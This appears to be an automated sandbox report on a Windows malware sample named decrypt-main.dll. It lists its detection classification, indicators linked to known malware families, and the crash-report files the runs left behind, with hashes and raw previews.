Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	26
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	decrypt-main.dll.dll (renamed file extension from exe to dll)
Original Sample Name:	decrypt-main.dll.exe
Detection:	MAL
Classification:	mal56.evad.winDLL@26/17@1/1
EGA Information:	Successful, ratio: 50%
HCA Information:	Failed

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.189.173.21, 20.42.73.29
Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, onedsblobprdwus16.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target rundll32.exe, PID 7532 because it is empty
Execution Graph export aborted for target rundll32.exe, PID 7924 because it is empty
Execution Graph export aborted for target rundll32.exe, PID 8048 because it is empty
Execution Graph export aborted for target rundll32.exe, PID 8068 because it is empty
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: decrypt-main.dll.dll

Simulations

Behavior and APIs

Time	Type	Description
16:51:05	API Interceptor	1x Sleep call for process: loaddll64.exe modified
16:51:15	API Interceptor	4x Sleep call for process: WerFault.exe modified

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
s3-r-w.sa-east-1.amazonaws.com	appdata -MpSvc.dll	Get hash	malicious	Unknown	Browse	3.5.234.32
	appdata -MpSvc.dll	Get hash	malicious	Unknown	Browse	3.5.233.174
	00023948209303294#U00ac320302282349843984903.exe	Get hash	malicious	Unknown	Browse	3.5.232.137
	00023948209303294#U00ac320302282349843984903.exe	Get hash	malicious	Unknown	Browse	16.12.1.14
	0219830219301290321012notas.exe	Get hash	malicious	Unknown	Browse	3.5.232.21
	0219830219301290321012notas.exe	Get hash	malicious	Unknown	Browse	3.5.234.1
	0923840932020004-3-0.exe	Get hash	malicious	Unknown	Browse	3.5.232.185
	WKYC506_2389030007-00901003007010_777380775_#U00b2.exe	Get hash	malicious	Unknown	Browse	52.95.163.114
	WKYC506_2389030007-00901003007010_777380775_#U00b2.exe	Get hash	malicious	Unknown	Browse	16.12.0.34
	DOC7186723912#U0370.msi	Get hash	malicious	Hidden Macro 4.0	Browse	52.95.164.60

ASNs

⊘No context

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	E-dekont.exe	Get hash	malicious	AgentTesla	Browse	16.12.1.62
	MT103.exe	Get hash	malicious	AgentTesla	Browse	16.12.1.62
	BL copy.exe	Get hash	malicious	FormBook, GuLoader	Browse	16.12.1.62
	2257HVL2300001691.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	16.12.1.62
	Bibeskftigelserne221.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	16.12.1.62
	https://us02web.zoom.us/j/81580289193?pwd=VjdCRUE1bjQ4dEpWUkpOR0poRm12dz09	Get hash	malicious	Unknown	Browse	16.12.1.62
	Interviewed.exe	Get hash	malicious	FormBook, GuLoader	Browse	16.12.1.62
	Scanned PO Copy.vbs	Get hash	malicious	FormBook, GuLoader	Browse	16.12.1.62
	EandP_approval_0311202401266.vbs	Get hash	malicious	XWorm	Browse	16.12.1.62
	2403131462348155_BPCT1203172627_txn_recipt.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	16.12.1.62

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_dec_2270e996a4650153f925c744fbbf6c68415b9_b4dfb63c_569e29e1-05cf-44e3-9716-dc16d6456d73\Report.wer

Process:	C:\Windows\System32\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.8478708389277979
Encrypted:	false
SSDEEP:	96:9NFGWd67uiyyKyusjZ4RvSCppfxPQXIDcQtZc6t1ZcEmcw3HXaXz+HbHgSQgJjeC:fztiyyuJ4097Z8jj2uwzuiFOZ24lO8J
MD5:	ACA9EB238F07C35892315F3BD3B1D039
SHA1:	5C412B30FF218604300D8676883E6168058CDD44
SHA-256:	A86C01BE89E6E233D67F67160F11770E394CAA60CC083E1C08E30502C484E8E8
SHA-512:	05D49C219D4CA0379286BCD68BCEA5887A2484FBA917D7E9B434B186EA8301FAD4FC96F2027CFC6B2E4722B1D321BFD6F82F9D294F7388F26996A48CA40129F2
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.4.8.1.8.6.6.2.4.1.2.5.5.3.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.4.8.1.8.6.6.3.0.2.1.9.2.5.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.6.9.e.2.9.e.1.-.0.5.c.f.-.4.4.e.3.-.9.7.1.6.-.d.c.1.6.d.6.4.5.6.d.7.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.9.c.b.d.2.7.7.-.2.2.4.6.-.4.9.a.5.-.9.7.5.2.-.9.7.8.3.a.8.0.6.d.b.7.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e._.d.e.c.r.y.p.t.-.m.a.i.n...d.l.l...d.l.l.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.e.f.4.-.0.0.0.1.-.0.0.1.4.-.2.d.4.4.-.e.7.3.f.5.e.7.5.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.d.d.3.9.9.a.e.4.6.3.0.3.3.4.3.f.9.f.0.d.a.1.8.9.a.e.e.1.1.c.6.7.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_dec_27d8c3fe9e4ce467db0e38d9cdded62657c28_b4dfb63c_1035b44d-43cf-4336-9f4b-7f94949dfc2c\Report.wer

Process:	C:\Windows\System32\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.8549111971973986
Encrypted:	false
SSDEEP:	192:2vP6i6hy6tD06UZMKFBj2uwzuiFOZ24lO8W:Tipgw6yMEBj4zuiFOY4lO8W
MD5:	84A48DC50389595FC31E329F9E4A3654
SHA1:	D64DF82EDEC7BB4ADB942F4060339148C5BBCBB5
SHA-256:	D03A4DCA4FC1A507B839242744E4F7E5E197DE389439938C0036C5BC82D01EFE
SHA-512:	D201809A8E16262060D811EAEB8CDD52C5E20AEC67A5A8CDE797C0B84488B133E9688DCA5927D58A4301E8F4BC19C7868EC7D637A17D4EBED7FE7821D479B7C4
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.6.4.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.4.8.1.8.6.6.5.6.2.0.1.1.6.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.4.8.1.8.6.6.6.1.8.2.6.2.0.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.0.3.5.b.4.4.d.-.4.3.c.f.-.4.3.3.6.-.9.f.4.b.-.7.f.9.4.9.4.9.d.f.c.2.c.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.e.2.b.8.b.3.7.-.a.4.1.3.-.4.7.d.2.-.b.1.5.5.-.f.2.8.1.1.4.8.8.5.c.b.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e._.d.e.c.r.y.p.t.-.m.a.i.n...d.l.l...d.l.l.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.f.8.4.-.0.0.0.1.-.0.0.1.4.-.5.5.b.8.-.c.6.4.1.5.e.7.5.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.d.d.3.9.9.a.e.4.6.3.0.3.3.4.3.f.9.f.0.d.a.1.8.9.a.e.e.1.1.c.6.7.b.d.8.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_dec_27d8c3fe9e4ce467db0e38d9cdded62657c28_b4dfb63c_f588a80a-de1f-4eaf-b9b3-2ea4a59f0162\Report.wer

Process:	C:\Windows\System32\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.8546204183284704
Encrypted:	false
SSDEEP:	192:wVgyfIilyGD06UZMKFBj2uwzuiFOZ24lO8W:wxIigGw6yMEBj4zuiFOY4lO8W
MD5:	F07E4AB95488B68AE4FC98FB29E35451
SHA1:	D18CD4702F440112E89C95AAF30B64276E99F8A1
SHA-256:	63D22D5D6A4E0F6C29887BD20128A5B4D064A7E13EADDB05CC67650608D5D3EB
SHA-512:	53FD6A7EBDA17E7C2391D8E6E49173028C0F945C5DBE7BB629B3F8FAC89FBD6C53E4CB4A30B79EB63FFE2458439B426E190B995FAB4B5385D43BFC2D7F86F33F
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.6.4.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.4.8.1.8.6.5.6.5.4.2.7.7.5.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.4.8.1.8.6.5.7.6.8.3.4.0.5.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.5.8.8.a.8.0.a.-.d.e.1.f.-.4.e.a.f.-.b.9.b.3.-.2.e.a.4.a.5.9.f.0.1.6.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.6.9.3.9.a.b.5.-.1.1.3.8.-.4.4.9.d.-.a.1.e.a.-.8.0.0.a.1.d.3.2.4.f.d.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e._.d.e.c.r.y.p.t.-.m.a.i.n...d.l.l...d.l.l.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.6.c.-.0.0.0.1.-.0.0.1.4.-.8.7.2.9.-.4.8.3.c.5.e.7.5.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.d.d.3.9.9.a.e.4.6.3.0.3.3.4.3.f.9.f.0.d.a.1.8.9.a.e.e.1.1.c.6.7.b.d.8.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_dec_e26d2cbdf0ab1647723bb3a38bd2737c2e0af57_b4dfb63c_e5ced0b6-a51a-4527-9ac5-1082608266c4\Report.wer

Process:	C:\Windows\System32\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.105367833591836
Encrypted:	false
SSDEEP:	192:AMVjiFytDI03+3h6j2undjfNzuiFOZ24lO8J:ZZiAtDj3+3ojZNzuiFOY4lO8J
MD5:	8B17E7AC2A50B78161935051F2F449F7
SHA1:	F9F0A829846B6ECFF7CA4A51EC9F5E9CF3093B99
SHA-256:	09349B3BF467C5635D97CA66EA18E255B293D5705E0E72F67E7A59BDF752C429
SHA-512:	E7C89B3EFD78278D555BC74F7D522B6D145E470EA5BFDCC88E40A371EAEFD95C3FB27FC3ACAAABEBF11B715B44FF287C4B111E4BE505EA843A268AECF8C50234
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.4.8.1.8.6.5.8.9.0.1.7.2.3.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.4.8.1.8.6.6.0.2.4.5.4.6.3.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.5.c.e.d.0.b.6.-.a.5.1.a.-.4.5.2.7.-.9.a.c.5.-.1.0.8.2.6.0.8.2.6.6.c.4.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.e.7.8.9.4.e.6.-.4.2.5.1.-.4.7.0.5.-.9.3.4.b.-.0.9.3.5.e.e.0.4.c.7.f.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e._.d.e.c.r.y.p.t.-.m.a.i.n...d.l.l...d.l.l.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.5.c.-.0.0.0.1.-.0.0.1.4.-.1.a.c.a.-.4.5.3.c.5.e.7.5.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.d.d.3.9.9.a.e.4.6.3.0.3.3.4.3.f.9.f.0.d.a.1.8.9.a.e.e.1.1.c.6.7.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER12DB.tmp.dmp

Process:	C:\Windows\System32\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Wed Mar 13 15:51:02 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	69140
Entropy (8bit):	1.5848665095012717
Encrypted:	false
SSDEEP:	192:b/TO9d9xiOMJ633RjgwpAqZwTm7xyECfFXkuLWgJ:DY9XAW3R7AqZwTm7xVCyuV
MD5:	6BD4D9D16CF255078E84A90B631342C9
SHA1:	B66ECA4D94BD69A357C8AD8F8BD82ABE51134F88
SHA-256:	333BFAE4645EC6133F7140AAF48A220AF1AACA841A1E0FA2A9BB9F9BC8F8E538
SHA-512:	F9C0B799499605B7A263DF5767602096E9718CF31C0778F55976CCBF57A99291C49F979EBFD853C5B98E1C38B7391C126A9C2664FFC8CA447F7EF68EA059E316
Malicious:	false
Preview:	MDMP..a..... .......f..e....................................4...~3..........T.......8...........T...............D...........P...........<...............................................................................eJ..............Lw......................T...........f..e.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER13B7.tmp.WERInternalMetadata.xml

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8794
Entropy (8bit):	3.702396505816361
Encrypted:	false
SSDEEP:	192:R6l7wVeJ9njAzd6YhCllgmf3rWFnprO89b1LDfgCHm:R6lXJpAzd6Y03gmf3rWF91vfgb
MD5:	78CE958AB74F543777C93321C5EC8B92
SHA1:	188AFC5BC82EE94D221D3820BF2C26880AE30FCD
SHA-256:	0B60E0E93695637843AE655EDD64B2557511815BE860DC0FF63406A6136AC444
SHA-512:	FF2A0FE0116D3D82802A2BF140FD3E6305249165E91A6D4EA773FEC5BF1EF55C207FF10B016768745024168BA2ACCD9A0A2B61F40DD9B45561065A54A3803391
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.9.2.4.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1406.tmp.xml

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4784
Entropy (8bit):	4.480323515110818
Encrypted:	false
SSDEEP:	48:cvIwWl8zs0Jg771I9VaWpW8VYDYm8M4JC2CUKFJyq85mQ5ptSTSFd:uIjfyI7yb7VPJaupoOFd
MD5:	E8E12C6114548A0DE21508C93F9FC95B
SHA1:	BA7DC8320ACDA110C02BBEA3146C09317530AA9E
SHA-256:	6AE2BA58913A7E7B9F928E939D4113C9A8BFACF02ECDAD96FCC38773B973F5F1
SHA-512:	011D90C03841752425486552C1C18A4D1F82302AA60676C9A9B561A33ED433C8D6B44ABC3D3546F77B6D25141D30A10D135430A628654A7F9C8712DFA8675C15
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="233693" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1F5E.tmp.dmp

Process:	C:\Windows\System32\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Wed Mar 13 15:51:05 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	58108
Entropy (8bit):	1.6976999797195729
Encrypted:	false
SSDEEP:	192:AVVe20+XueOMRCk/TDjfM4YQ54PXdwaHPMmsa2cchCLyYK:0M2l+ZAv/TDjfM4YVHPbF4CLBK
MD5:	BD0C640F100B31214C2C206CEE1F977E
SHA1:	D607F980205F602C97A6A61CD33E3288F37AC150
SHA-256:	C6CF2D8F6ABD0ED0793014C1416EFBCAB99565D646A81E3D6FC3CC79E463E6CC
SHA-512:	1985FDCBFAC491CB581B67044034CEEA0202FA2609D9E1FDA56AAB9065835042A2DF105B3A68CC10B8B0A95F936946A21405DB8CAB5AD84C5F4E1614D36AEEB6
Malicious:	false
Preview:	MDMP..a..... .......i..e........................................~...........T.......8...........T...............,........... ...........................................................................................eJ..............Lw......................T...........i..e.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER200B.tmp.WERInternalMetadata.xml

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	9070
Entropy (8bit):	3.696079830488304
Encrypted:	false
SSDEEP:	192:R6l7wVeJrG3oX6YKQgtOgmf2INmFhprj89b6z8fcvIem:R6lXJa3oX6YvgUgmf2IuI6ofcg
MD5:	D275B927E3B0D846A47325A9409190D9
SHA1:	A94048D4BB03F8E46F2743D3BF1F5AA3493856F3
SHA-256:	2E622E5A8723B7CEB3EA2A2D258545FE78565F00723EEB12911243EC31DC5819
SHA-512:	314B3D519590B7D76EEF2169EF5A4C66EBAA48B59409287F6B8E934854B7B61F85B0E7786CBD717A005690A38DFFE7C534909F038D26571E80D6084E47A043A6
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.8.0.6.8.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER203B.tmp.xml

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4903
Entropy (8bit):	4.468981602436986
Encrypted:	false
SSDEEP:	48:cvIwWl8zs0Jg771I9VaWpW8VYqYm8M4JC2CU/F2Koyq8vhUZuVptSTSBd:uIjfyI7yb7VaJEKoWvVpoOBd
MD5:	FC6A380DAE8EB28FBB4711A39CEEA83B
SHA1:	57A61096F84D945877555A0BEF42D0FC6B30A360
SHA-256:	5BF223640218A3C2D8318E454A85976B59DF6C75044978D6DB34C17152EE9455
SHA-512:	CB15A16F8A65505B451D3D5D896D37E660741BCAD7A1307EB09E06EE4D1D759943D6B0CC109C7384D7C1473AFAFA3C4C03FBFA8A89B0C4064254E5A43A05BB4C
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="233693" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WER51F.tmp.dmp

Process:	C:\Windows\System32\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Wed Mar 13 15:50:59 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	187746
Entropy (8bit):	1.5244364413253133
Encrypted:	false
SSDEEP:	384:C0w7BwLbRO+GdgQKbd38BC7UMPUCCCCJAfXePfiL6/kPcRy/O4eFLAF:bw7BwLc+Gdhs7UMPUCCCCJiLJkEGF
MD5:	1B08ABC5DFCED9B1BD7FC659256ACA08
SHA1:	AAD8572C3C95659E8EB6F6A1E8323956FB0A259E
SHA-256:	05D3D46A9CEE48B42ED7652D2BDDAD2C5788F05231F1BB6D46DA71511FC96074
SHA-512:	C709CE12A1132441259983897926510D8CF828CB8717705E41795CB96085B117F3C9FE11CFD0484B5669AFCAA363CFB719EABDB0071F8D708AF38704F05C9BBE
Malicious:	false
Preview:	MDMP..a..... .......c..e.........................................i..........T.......8...........T............N..............%...........'..............................................................................eJ......T(......Lw......................T.......\..._..e.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER918.tmp.WERInternalMetadata.xml

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	9010
Entropy (8bit):	3.7074128279527345
Encrypted:	false
SSDEEP:	192:R6l7wVeJgk36Yh/llgmf3R4l00MprH89bi9OfFRWm:R6lXJr36Yp3gmf3R4lLi0fFJ
MD5:	85773FCCCC2EA05FC98BD5D8FED300DD
SHA1:	9608BFD95650FF7FE630BD7D7CC0AF7F38CAA0A0
SHA-256:	A4549B81B2F90A362CF60820D77B6B2B4F88BA9B72CC1575B8685F00DFD0AC70
SHA-512:	D0789139A855BB8B22B8967770A2E8005BBCF3A83429E51D3BF34872ABCFE14D4428F65373DBCE9B9673CEF065AFEAD93DB46B3F1FBFD5039693B747506B8B21
Malicious:	false
